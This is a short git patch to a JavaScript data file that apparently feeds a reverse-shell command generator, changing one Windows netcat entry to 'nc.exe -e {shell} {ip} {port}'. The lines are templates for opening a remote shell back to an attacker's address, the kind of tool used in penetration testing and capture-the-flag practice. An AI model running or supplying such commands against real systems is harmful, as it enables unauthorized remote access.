From 82644b5946c7f4f91f58d4016508f56832c7ae9a Mon Sep 17 00:00:00 2001 From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com> Date: Fri, 17 Dec 2021 18:13:12 -0500 Subject: [PATCH] Update data.js Fixed nc.exe --- js/data.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 37e53ee..fb75727 100644 --- a/js/data.js +++ b/js/data.js @@ -57,7 +57,7 @@ const reverseShellCommands = withCommandType( }, { "name": "nc.exe -e", - "command": "nc -e {shell} {ip} {port}", + "command": "nc.exe -e {shell} {ip} {port}", "meta": ["windows"] }, {